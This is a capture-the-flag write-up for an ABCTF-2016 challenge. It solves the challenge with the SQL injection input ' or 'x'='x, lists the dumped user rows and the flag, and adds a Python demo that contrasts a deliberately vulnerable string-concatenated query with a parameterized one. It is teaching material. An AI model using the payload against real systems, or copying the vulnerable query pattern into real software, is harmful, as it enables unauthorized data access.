ABCTF-2016

Get ‘Em all

Challenge

I think one of the users data fields holds a flag. If only you could find the username.

Solution

This is a SQL injection challenge. We enter the following in the input field:

' or 'x'='x

and get the following output, which includes the flag:

Name: Luke
Data: I made this problem.
Name: Alec
Data: Steam boys.
Name: Jalen
Data: Pump that iron fool.
Name: Eric
Data: I make cars.
Name: Sam
Data: Thinks he knows SQL.
Name: fl4g__giv3r
Data: ABCTF{th4t_is_why_you_n33d_to_sanitiz3_inputs}
Name: snoutpop
Data: jowls
Name: Chunbucket
Data: @datboiiii
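
Why that input returns every row, shown as an added example that is not part of the original writeup or the challenge's own code. The table name, column names and query shape are assumptions (the server-side code is not shown), and the rows are a constructed subset of the output above. The concatenated query is contrasted with a parameterized one.

```python
import sqlite3

# Constructed stand-in for the challenge database. The real schema and query
# are not shown in the writeup, so "users", "name" and "data" are assumptions.
ROWS = [
    ("Luke", "I made this problem."),
    ("Sam", "Thinks he knows SQL."),
    ("fl4g__giv3r", "ABCTF{th4t_is_why_you_n33d_to_sanitiz3_inputs}"),
]

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, data TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", ROWS)
    return db

def build_query(name):
    # Vulnerable: the input is pasted between the quotes of a string literal,
    # so a quote in the input ends the literal and the rest is parsed as SQL.
    return "SELECT name, data FROM users WHERE name = '" + name + "'"

def lookup_vulnerable(db, name):
    return db.execute(build_query(name)).fetchall()

def lookup_parameterized(db, name):
    # Hardened: the value is bound by the driver, so quotes in it stay data
    # and the WHERE clause compares against the literal input string.
    return db.execute(
        "SELECT name, data FROM users WHERE name = ?", (name,)
    ).fetchall()

if __name__ == "__main__":
    db = make_db()
    payload = "' or 'x'='x"  # the input from the writeup
    # WHERE name = '' or 'x'='x' is true for every row
    print(build_query(payload))
    print(lookup_vulnerable(db, payload))
    # No user has that literal name, so nothing is returned
    print(lookup_parameterized(db, payload))
    # Normal lookups still work
    print(lookup_parameterized(db, "Sam"))
```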

Flag

ABCTF{th4t_is_why_you_n33d_to_sanitiz3_inputs}